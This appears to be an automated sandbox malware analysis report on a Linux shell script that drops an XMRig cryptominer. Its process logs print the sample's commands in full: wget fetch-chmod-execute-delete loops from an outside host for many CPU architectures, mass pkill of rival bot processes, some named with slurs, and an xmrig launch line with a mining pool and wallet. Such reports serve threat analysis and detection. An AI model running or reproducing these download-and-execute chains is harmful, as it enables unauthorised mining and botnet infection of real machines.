Malware Analysis Report

2025-01-02 07:09

Sample ID 241124-c6lz3awmfk
Target ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf.sh
SHA256 ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf
Tags
defense_evasion discovery xmrig xmrig_linux miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf

Threat Level: Known bad

The file ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf.sh was found to be: Known bad.

Malicious Activity Summary

defense_evasion discovery xmrig xmrig_linux miner

xmrig

XMRig Miner payload

Xmrig_linux family

Xmrig family

Executes dropped EXE

File and Directory Permissions Modification

Enumerates running processes

Reads CPU attributes

Reads runtime system information

Writes file to tmp directory

System Network Configuration Discovery

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-24 02:41

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-24 02:41

Reported

2024-11-24 02:44

Platform

debian9-armhf-20240611-en

Max time kernel

2s

Max time network

30s

Command Line

[/tmp/ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /tmp/yakuza.mips N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/yakuza.mipsel N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A

Processes

/tmp/ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf.sh

[/tmp/ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf.sh]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.mips]

/bin/chmod

[chmod +x yakuza.mips]

/tmp/yakuza.mips

[./yakuza.mips]

/bin/rm

[rm -rf yakuza.mips]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.mipsel]

/bin/chmod

[chmod +x yakuza.mipsel]

/tmp/yakuza.mipsel

[./yakuza.mipsel]

/bin/rm

[rm -rf yakuza.mipsel]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.sh]

/bin/chmod

[chmod +x yakuza.sh]

/tmp/yakuza.sh

[./yakuza.sh]

/bin/rm

[rm -rf yakuza.sh]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.x86]

/bin/chmod

[chmod +x yakuza.x86]

/tmp/yakuza.x86

[./yakuza.x86]

/bin/rm

[rm -rf yakuza.x86]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm6]

Network

Country Destination Domain Proto
US 1.1.1.1:53 linux-it.abuser.eu udp
US 1.1.1.1:53 linux-it.abuser.eu udp
US 1.1.1.1:53 linux-it.abuser.eu udp
US 1.1.1.1:53 linux-it.abuser.eu udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-24 02:41

Reported

2024-11-24 02:43

Platform

debian9-mipsbe-20240611-en

Max time kernel

150s

Max time network

153s

Command Line

[/tmp/ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf.sh]

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xmrig family

xmrig

Xmrig_linux family

xmrig_linux

xmrig

miner xmrig_linux

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/yakuza.mips /tmp/yakuza.mips N/A
N/A /tmp/xmrig /tmp/xmrig N/A

Enumerates running processes

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /bin/ps N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/11/cmdline /usr/bin/pkill N/A
File opened for reading /proc/76/cmdline /usr/bin/pkill N/A
File opened for reading /proc/380/status /usr/bin/pkill N/A
File opened for reading /proc/705/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1256/cmdline /usr/bin/pkill N/A
File opened for reading /proc/12/cmdline /usr/bin/pkill N/A
File opened for reading /proc/5/cmdline /usr/bin/pkill N/A
File opened for reading /proc/37/status /usr/bin/pkill N/A
File opened for reading /proc/23/cmdline /usr/bin/pkill N/A
File opened for reading /proc/243/cmdline /usr/bin/pkill N/A
File opened for reading /proc/328/cmdline /usr/bin/pkill N/A
File opened for reading /proc/419/status /usr/bin/pkill N/A
File opened for reading /proc/71/status /usr/bin/pkill N/A
File opened for reading /proc/5/status /usr/bin/pkill N/A
File opened for reading /proc/386/cmdline /usr/bin/pkill N/A
File opened for reading /proc/filesystems /usr/bin/pkill N/A
File opened for reading /proc/741/status /usr/bin/pkill N/A
File opened for reading /proc/1095/status /usr/bin/pkill N/A
File opened for reading /proc/741/cmdline /usr/bin/pkill N/A
File opened for reading /proc/747/status /usr/bin/pkill N/A
File opened for reading /proc/7/cmdline /usr/bin/pkill N/A
File opened for reading /proc/22/status /usr/bin/pkill N/A
File opened for reading /proc/174/status /usr/bin/pkill N/A
File opened for reading /proc/386/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1110/status /usr/bin/pkill N/A
File opened for reading /proc/13/cmdline /usr/bin/pkill N/A
File opened for reading /proc/359/cmdline /usr/bin/pkill N/A
File opened for reading /proc/359/status /usr/bin/pkill N/A
File opened for reading /proc/154/status /usr/bin/pkill N/A
File opened for reading /proc/706/cmdline /usr/bin/pkill N/A
File opened for reading /proc/354/status /usr/bin/pkill N/A
File opened for reading /proc/12/status /usr/bin/pkill N/A
File opened for reading /proc/4/status /usr/bin/pkill N/A
File opened for reading /proc/12/cmdline /usr/bin/pkill N/A
File opened for reading /proc/174/status /usr/bin/pkill N/A
File opened for reading /proc/111/status /usr/bin/pkill N/A
File opened for reading /proc/8/cmdline /usr/bin/pkill N/A
File opened for reading /proc/125/cmdline /usr/bin/pkill N/A
File opened for reading /proc/36/cmdline /usr/bin/pkill N/A
File opened for reading /proc/sys/kernel/osrelease /usr/bin/pkill N/A
File opened for reading /proc/1/status /usr/bin/pkill N/A
File opened for reading /proc/739/cmdline /usr/bin/pkill N/A
File opened for reading /proc/6/status /usr/bin/pkill N/A
File opened for reading /proc/12/cmdline /usr/bin/pkill N/A
File opened for reading /proc/23/cmdline /usr/bin/pkill N/A
File opened for reading /proc/6/status /usr/bin/pkill N/A
File opened for reading /proc/22/cmdline /usr/bin/pkill N/A
File opened for reading /proc/76/cmdline /usr/bin/pkill N/A
File opened for reading /proc/13/status /usr/bin/pkill N/A
File opened for reading /proc/680/status /usr/bin/pkill N/A
File opened for reading /proc/21/cmdline /usr/bin/pkill N/A
File opened for reading /proc/243/cmdline /usr/bin/pkill N/A
File opened for reading /proc/672/status /usr/bin/pkill N/A
File opened for reading /proc/6/cmdline /usr/bin/pkill N/A
File opened for reading /proc/380/status /usr/bin/pkill N/A
File opened for reading /proc/sys/kernel/osrelease /usr/bin/pkill N/A
File opened for reading /proc/355/cmdline /usr/bin/pkill N/A
File opened for reading /proc/705/cmdline /usr/bin/pkill N/A
File opened for reading /proc/73/cmdline /usr/bin/pkill N/A
File opened for reading /proc/filesystems /usr/bin/pkill N/A
File opened for reading /proc/4/status /usr/bin/pkill N/A
File opened for reading /proc/70/cmdline /usr/bin/pkill N/A
File opened for reading /proc/76/status /usr/bin/pkill N/A
File opened for reading /proc/124/cmdline /usr/bin/pkill N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/rm N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/pkill N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/yakuza.mips N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /tmp/yakuza.mipsel N/A
N/A N/A /bin/sh N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/yakuza.mips /usr/bin/wget N/A
File opened for modification /tmp/yakuza.mipsel /usr/bin/wget N/A
File opened for modification /tmp/yakuza.arm5 /usr/bin/wget N/A
File opened for modification /tmp/xmrig /usr/bin/curl N/A
File opened for modification /tmp/S�@@p�~@8 /bin/sh N/A
File opened for modification /tmp/yakuza.sh /usr/bin/wget N/A
File opened for modification /tmp/yakuza.arm6 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.i686 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.x86 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.ppc /usr/bin/wget N/A
File opened for modification /tmp/yakuza.arm7 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.sparc /usr/bin/wget N/A
File opened for modification /tmp/yakuza.i586 /usr/bin/wget N/A
File opened for modification /tmp/yakuza.m68k /usr/bin/wget N/A
File opened for modification /tmp/yakuza.arm4 /usr/bin/wget N/A

Processes

/tmp/ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf.sh

[/tmp/ca0bd413a34399accc6f62506ac94f9c7e1fd5c4efa49d1627eed568b1de78bf.sh]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.mips]

/bin/chmod

[chmod +x yakuza.mips]

/tmp/yakuza.mips

[./yakuza.mips]

/bin/rm

[rm -rf yakuza.mips]

/bin/sh

[sh -c pkill -9 902i13 || busybox pkill -9 902i13]

/usr/bin/pkill

[pkill -9 902i13]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.mipsel]

/bin/busybox

[busybox pkill -9 902i13]

/bin/sh

[sh -c pkill -9 BzSxLxBxeY || busybox pkill -9 BzSxLxBxeY]

/usr/bin/pkill

[pkill -9 BzSxLxBxeY]

/bin/busybox

[busybox pkill -9 BzSxLxBxeY]

/bin/chmod

[chmod +x yakuza.mipsel]

/tmp/yakuza.mipsel

[./yakuza.mipsel]

/bin/sh

[sh -c pkill -9 HOHO-LUGO7 || busybox pkill -9 HOHO-LUGO7]

/usr/bin/pkill

[pkill -9 HOHO-LUGO7]

/bin/rm

[rm -rf yakuza.mipsel]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.sh]

/bin/busybox

[busybox pkill -9 HOHO-LUGO7]

/bin/sh

[sh -c pkill -9 HOHO-U79OL || busybox pkill -9 HOHO-U79OL]

/usr/bin/pkill

[pkill -9 HOHO-U79OL]

/bin/busybox

[busybox pkill -9 HOHO-U79OL]

/bin/sh

[sh -c pkill -9 JuYfouyf87 || busybox pkill -9 JuYfouyf87]

/usr/bin/pkill

[pkill -9 JuYfouyf87]

/bin/busybox

[busybox pkill -9 JuYfouyf87]

/bin/sh

[sh -c pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd]

/usr/bin/pkill

[pkill -9 NiGGeR69xd]

/bin/chmod

[chmod +x yakuza.sh]

/tmp/yakuza.sh

[./yakuza.sh]

/bin/busybox

[busybox pkill -9 NiGGeR69xd]

/bin/rm

[rm -rf yakuza.sh]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.x86]

/bin/sh

[sh -c pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X]

/usr/bin/pkill

[pkill -9 SO190Ij1X]

/bin/busybox

[busybox pkill -9 SO190Ij1X]

/bin/chmod

[chmod +x yakuza.x86]

/tmp/yakuza.x86

[./yakuza.x86]

/bin/sh

[sh -c pkill -9 LOLKIKEEEDDE || busybox pkill -9 LOLKIKEEEDDE]

/usr/bin/pkill

[pkill -9 LOLKIKEEEDDE]

/bin/rm

[rm -rf yakuza.x86]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm6]

/bin/busybox

[busybox pkill -9 LOLKIKEEEDDE]

/bin/sh

[sh -c pkill -9 ekjheory98e || busybox pkill -9 ekjheory98e]

/usr/bin/pkill

[pkill -9 ekjheory98e]

/bin/busybox

[busybox pkill -9 ekjheory98e]

/bin/chmod

[chmod +x yakuza.arm6]

/tmp/yakuza.arm6

[./yakuza.arm6]

/bin/sh

[sh -c pkill -9 scansh4 || busybox pkill -9 scansh4]

/usr/bin/pkill

[pkill -9 scansh4]

/bin/rm

[rm -rf yakuza.arm6]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.i686]

/bin/busybox

[busybox pkill -9 scansh4]

/bin/sh

[sh -c pkill -9 MDMA || busybox pkill -9 MDMA]

/usr/bin/pkill

[pkill -9 MDMA]

/bin/busybox

[busybox pkill -9 MDMA]

/bin/chmod

[chmod +x yakuza.i686]

/tmp/yakuza.i686

[./yakuza.i686]

/bin/sh

[sh -c pkill -9 fdevalvex || busybox pkill -9 fdevalvex]

/usr/bin/pkill

[pkill -9 fdevalvex]

/bin/rm

[rm -rf yakuza.i686]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.ppc]

/bin/busybox

[busybox pkill -9 fdevalvex]

/bin/sh

[sh -c pkill -9 scanspc || busybox pkill -9 scanspc]

/usr/bin/pkill

[pkill -9 scanspc]

/bin/busybox

[busybox pkill -9 scanspc]

/bin/sh

[sh -c pkill -9 MELTEDNINJAREALZ || busybox pkill -9 MELTEDNINJAREALZ]

/usr/bin/pkill

[pkill -9 MELTEDNINJAREALZ]

/bin/busybox

[busybox pkill -9 MELTEDNINJAREALZ]

/bin/chmod

[chmod +x yakuza.ppc]

/tmp/yakuza.ppc

[./yakuza.ppc]

/bin/rm

[rm -rf yakuza.ppc]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.i586]

/bin/sh

[sh -c pkill -9 flexsonskids || busybox pkill -9 flexsonskids]

/usr/bin/pkill

[pkill -9 flexsonskids]

/bin/busybox

[busybox pkill -9 flexsonskids]

/bin/sh

[sh -c pkill -9 scanx86 || busybox pkill -9 scanx86]

/usr/bin/pkill

[pkill -9 scanx86]

/bin/chmod

[chmod +x yakuza.i586]

/tmp/yakuza.i586

[./yakuza.i586]

/bin/busybox

[busybox pkill -9 scanx86]

/bin/rm

[rm -rf yakuza.i586]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.m68k]

/bin/sh

[sh -c pkill -9 MISAKI-U79OL || busybox pkill -9 MISAKI-U79OL]

/usr/bin/pkill

[pkill -9 MISAKI-U79OL]

/bin/busybox

[busybox pkill -9 MISAKI-U79OL]

/bin/chmod

[chmod +x yakuza.m68k]

/tmp/yakuza.m68k

[./yakuza.m68k]

/bin/sh

[sh -c pkill -9 foAxi102kxe || busybox pkill -9 foAxi102kxe]

/bin/rm

[rm -rf yakuza.m68k]

/usr/bin/pkill

[pkill -9 foAxi102kxe]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm4]

/bin/busybox

[busybox pkill -9 foAxi102kxe]

/bin/sh

[sh -c pkill -9 swodjwodjwoj || busybox pkill -9 swodjwodjwoj]

/usr/bin/pkill

[pkill -9 swodjwodjwoj]

/bin/busybox

[busybox pkill -9 swodjwodjwoj]

/bin/chmod

[chmod +x yakuza.arm4]

/tmp/yakuza.arm4

[./yakuza.arm4]

/bin/rm

[rm -rf yakuza.arm4]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm5]

/bin/sh

[sh -c pkill -9 MmKiy7f87l || busybox pkill -9 MmKiy7f87l]

/usr/bin/pkill

[pkill -9 MmKiy7f87l]

/bin/busybox

[busybox pkill -9 MmKiy7f87l]

/bin/sh

[sh -c pkill -9 freecookiex86 || busybox pkill -9 freecookiex86]

/usr/bin/pkill

[pkill -9 freecookiex86]

/bin/busybox

[busybox pkill -9 freecookiex86]

/bin/chmod

[chmod +x yakuza.arm5]

/tmp/yakuza.arm5

[./yakuza.arm5]

/bin/rm

[rm -rf yakuza.arm5]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.arm7]

/bin/sh

[sh -c pkill -9 sysgpu || busybox pkill -9 sysgpu]

/usr/bin/pkill

[pkill -9 sysgpu]

/bin/busybox

[busybox pkill -9 sysgpu]

/bin/sh

[sh -c pkill -9 NiGGeR69xd || busybox pkill -9 NiGGeR69xd]

/usr/bin/pkill

[pkill -9 NiGGeR69xd]

/bin/busybox

[busybox pkill -9 NiGGeR69xd]

/bin/chmod

[chmod +x yakuza.arm7]

/tmp/yakuza.arm7

[./yakuza.arm7]

/bin/rm

[rm -rf yakuza.arm7]

/usr/bin/wget

[wget http://linux-it.abuser.eu/yakuza.sparc]

/bin/sh

[sh -c pkill -9 frgege || busybox pkill -9 frgege]

/usr/bin/pkill

[pkill -9 frgege]

/bin/busybox

[busybox pkill -9 frgege]

/bin/sh

[sh -c pkill -9 sysupdater || busybox pkill -9 sysupdater]

/usr/bin/pkill

[pkill -9 sysupdater]

/bin/busybox

[busybox pkill -9 sysupdater]

/bin/chmod

[chmod +x yakuza.sparc]

/tmp/yakuza.sparc

[./yakuza.sparc]

/bin/rm

[rm -rf yakuza.sparc]

/bin/bash

[bash]

/usr/bin/curl

[curl -s http://linux-it.abuser.eu/test.php]

/bin/grep

[grep xmrig]

/bin/grep

[grep -v grep]

/bin/ps

[ps x]

/bin/grep

[grep 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW]

/bin/sh

[sh -c pkill -9 0DnAzepd || busybox pkill -9 0DnAzepd]

/usr/bin/pkill

[pkill -9 0DnAzepd]

/bin/busybox

[busybox pkill -9 0DnAzepd]

/usr/bin/curl

[curl -O ftp://linux-it.abuser.eu/xmrig-lnx/xmrig]

/bin/sh

[sh -c pkill -9 NiGGeRD0nks69 || busybox pkill -9 NiGGeRD0nks69]

/usr/bin/pkill

[pkill -9 NiGGeRD0nks69]

/bin/busybox

[busybox pkill -9 NiGGeRD0nks69]

/bin/sh

[sh -c pkill -9 frgreu || busybox pkill -9 frgreu]

/usr/bin/pkill

[pkill -9 frgreu]

/bin/busybox

[busybox pkill -9 frgreu]

/bin/sh

[sh -c pkill -9 telnetd || busybox pkill -9 telnetd]

/usr/bin/pkill

[pkill -9 telnetd]

/bin/busybox

[busybox pkill -9 telnetd]

/bin/sh

[sh -c pkill -9 0x766f6964 || busybox pkill -9 0x766f6964]

/usr/bin/pkill

[pkill -9 0x766f6964]

/bin/busybox

[busybox pkill -9 0x766f6964]

/bin/sh

[sh -c pkill -9 NiGGeRd0nks1337 || busybox pkill -9 NiGGeRd0nks1337]

/usr/bin/pkill

[pkill -9 NiGGeRd0nks1337]

/bin/busybox

[busybox pkill -9 NiGGeRd0nks1337]

/bin/sh

[sh -c pkill -9 gaft || busybox pkill -9 gaft]

/usr/bin/pkill

[pkill -9 gaft]

/bin/busybox

[busybox pkill -9 gaft]

/bin/sh

[sh -c pkill -9 urasgbsigboa || busybox pkill -9 urasgbsigboa]

/usr/bin/pkill

[pkill -9 urasgbsigboa]

/bin/busybox

[busybox pkill -9 urasgbsigboa]

/bin/sh

[sh -c pkill -9 120i3UI49 || busybox pkill -9 120i3UI49]

/usr/bin/pkill

[pkill -9 120i3UI49]

/bin/busybox

[busybox pkill -9 120i3UI49]

/bin/sh

[sh -c pkill -9 OaF3 || busybox pkill -9 OaF3]

/usr/bin/pkill

[pkill -9 OaF3]

/bin/busybox

[busybox pkill -9 OaF3]

/bin/chmod

[chmod +x xmrig]

/usr/bin/nohup

[nohup ./xmrig --url gulf.moneroocean.stream:443 --user 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW --pass worker652 --tls --cpu-priority=3 --asm=auto]

/tmp/xmrig

[./xmrig --url gulf.moneroocean.stream:443 --user 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW --pass worker652 --tls --cpu-priority=3 --asm=auto]

/bin/sh

[/bin/sh ./xmrig --url gulf.moneroocean.stream:443 --user 45RjcttikAkHAhhBZiLKCZFasC98mrfJ2aJkZasQgr4hUwYkB2QPWqUZnxDuwBVjveT59ZbF2xdmVDQQYdU8EQdhVaJ7amW --pass worker652 --tls --cpu-priority=3 --asm=auto]

/bin/sh

[sh -c pkill -9 geae || busybox pkill -9 geae]

/usr/bin/pkill

[pkill -9 geae]

/bin/busybox

[busybox pkill -9 geae]

/bin/sh

[sh -c pkill -9 vaiolmao || busybox pkill -9 vaiolmao]

/usr/bin/pkill

[pkill -9 vaiolmao]

/bin/busybox

[busybox pkill -9 vaiolmao]

/bin/sh

[sh -c pkill -9 123123a || busybox pkill -9 123123a]

/usr/bin/pkill

[pkill -9 123123a]

/bin/busybox

[busybox pkill -9 123123a]

/bin/sh

[sh -c pkill -9 Ofurain0n4H34D || busybox pkill -9 Ofurain0n4H34D]

/usr/bin/pkill

[pkill -9 Ofurain0n4H34D]

/bin/busybox

[busybox pkill -9 Ofurain0n4H34D]

/bin/sh

[sh -c pkill -9 ggTrex || busybox pkill -9 ggTrex]

/usr/bin/pkill

[pkill -9 ggTrex]

/bin/busybox

[busybox pkill -9 ggTrex]

/bin/sh

[sh -c pkill -9 wasads || busybox pkill -9 wasads]

/usr/bin/pkill

[pkill -9 wasads]

/bin/busybox

[busybox pkill -9 wasads]

/bin/sh

[sh -c pkill -9 1293194hjXD || busybox pkill -9 1293194hjXD]

/usr/bin/pkill

[pkill -9 1293194hjXD]

/bin/busybox

[busybox pkill -9 1293194hjXD]

/bin/sh

[sh -c pkill -9 OthLaLosn || busybox pkill -9 OthLaLosn]

/usr/bin/pkill

[pkill -9 OthLaLosn]

/bin/busybox

[busybox pkill -9 OthLaLosn]

/bin/sh

[sh -c pkill -9 ggt || busybox pkill -9 ggt]

/usr/bin/pkill

[pkill -9 ggt]

/bin/busybox

[busybox pkill -9 ggt]

/bin/sh

[sh -c pkill -9 wget-log || busybox pkill -9 wget-log]

/usr/bin/pkill

[pkill -9 wget-log]

/bin/busybox

[busybox pkill -9 wget-log]

/bin/sh

[sh -c pkill -9 1337SoraLOADER || busybox pkill -9 1337SoraLOADER]

/usr/bin/pkill

[pkill -9 1337SoraLOADER]

/bin/busybox

[busybox pkill -9 1337SoraLOADER]

/bin/sh

[sh -c pkill -9 SAIAKINA || busybox pkill -9 SAIAKINA]

/usr/bin/pkill

[pkill -9 SAIAKINA]

/bin/busybox

[busybox pkill -9 SAIAKINA]

/bin/sh

[sh -c pkill -9 ggtq || busybox pkill -9 ggtq]

/usr/bin/pkill

[pkill -9 ggtq]

/bin/busybox

[busybox pkill -9 ggtq]

/bin/sh

[sh -c pkill -9 1378bfp919GRB1Q2 || busybox pkill -9 1378bfp919GRB1Q2]

/usr/bin/pkill

[pkill -9 1378bfp919GRB1Q2]

/bin/busybox

[busybox pkill -9 1378bfp919GRB1Q2]

/bin/sh

[sh -c pkill -9 SAIAKUSO || busybox pkill -9 SAIAKUSO]

/usr/bin/pkill

[pkill -9 SAIAKUSO]

/bin/busybox

[busybox pkill -9 SAIAKUSO]

/bin/sh

[sh -c pkill -9 ggtr || busybox pkill -9 ggtr]

/usr/bin/pkill

[pkill -9 ggtr]

/bin/busybox

[busybox pkill -9 ggtr]

/bin/sh

[sh -c pkill -9 14Fa || busybox pkill -9 14Fa]

/usr/bin/pkill

[pkill -9 14Fa]

/bin/busybox

[busybox pkill -9 14Fa]

/bin/sh

[sh -c pkill -9 SEXSLAVE1337 || busybox pkill -9 SEXSLAVE1337]

/usr/bin/pkill

[pkill -9 SEXSLAVE1337]

/bin/busybox

[busybox pkill -9 SEXSLAVE1337]

/bin/sh

[sh -c pkill -9 ggtt || busybox pkill -9 ggtt]

/usr/bin/pkill

[pkill -9 ggtt]

/bin/busybox

[busybox pkill -9 ggtt]

/bin/sh

[sh -c pkill -9 1902a3u912u3u4 || busybox pkill -9 1902a3u912u3u4]

/usr/bin/pkill

[pkill -9 1902a3u912u3u4]

/bin/busybox

[busybox pkill -9 1902a3u912u3u4]

/bin/sh

[sh -c pkill -9 SO190Ij1X || busybox pkill -9 SO190Ij1X]

/usr/bin/pkill

[pkill -9 SO190Ij1X]

/bin/busybox

[busybox pkill -9 SO190Ij1X]

/bin/sh

[sh -c pkill -9 haetrghbr || busybox pkill -9 haetrghbr]

/usr/bin/pkill

[pkill -9 haetrghbr]

/bin/busybox

[busybox pkill -9 haetrghbr]

/bin/sh

